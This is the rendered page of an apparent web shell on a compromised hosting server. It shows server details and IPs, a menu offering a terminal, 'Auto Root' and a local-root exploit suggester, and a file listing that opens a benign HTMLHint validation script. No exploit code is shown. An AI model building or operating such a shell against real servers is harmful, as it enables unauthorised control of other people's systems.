Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
sitepad /
editor /
site-inc /
js /
codemirror /
Delete
Unzip
Name
Size
Permission
Date
Action
codemirror.min.css
15.53
KB
-rw-r--r--
2025-11-28 07:18
codemirror.min.js
571.69
KB
-rw-r--r--
2025-11-28 07:18
csslint.js
368.78
KB
-rw-r--r--
2025-11-28 07:18
esprima.js
276.51
KB
-rw-r--r--
2025-11-28 07:18
fakejshint.js
1002
B
-rw-r--r--
2025-11-28 07:18
htmlhint-kses.js
984
B
-rw-r--r--
2025-11-28 07:18
htmlhint.js
17.32
KB
-rw-r--r--
2025-11-28 07:18
jsonlint.js
15.81
KB
-rw-r--r--
2025-11-28 07:18
Save
Rename
/* global HTMLHint */ /* eslint no-magic-numbers: ["error", { "ignore": [0, 1] }] */ HTMLHint.addRule({ id: 'kses', description: 'Element or attribute cannot be used.', init: function( parser, reporter, options ) { 'use strict'; var self = this; parser.addListener( 'tagstart', function( event ) { var attr, col, attrName, allowedAttributes, i, len, tagName; tagName = event.tagName.toLowerCase(); if ( ! options[ tagName ] ) { reporter.error( 'Tag <' + event.tagName + '> is not allowed.', event.line, event.col, self, event.raw ); return; } allowedAttributes = options[ tagName ]; col = event.col + event.tagName.length + 1; for ( i = 0, len = event.attrs.length; i < len; i++ ) { attr = event.attrs[ i ]; attrName = attr.name.toLowerCase(); if ( ! allowedAttributes[ attrName ] ) { reporter.error( 'Tag attribute [' + attr.raw + ' ] is not allowed.', event.line, col + attr.index, self, attr.raw ); } } }); } });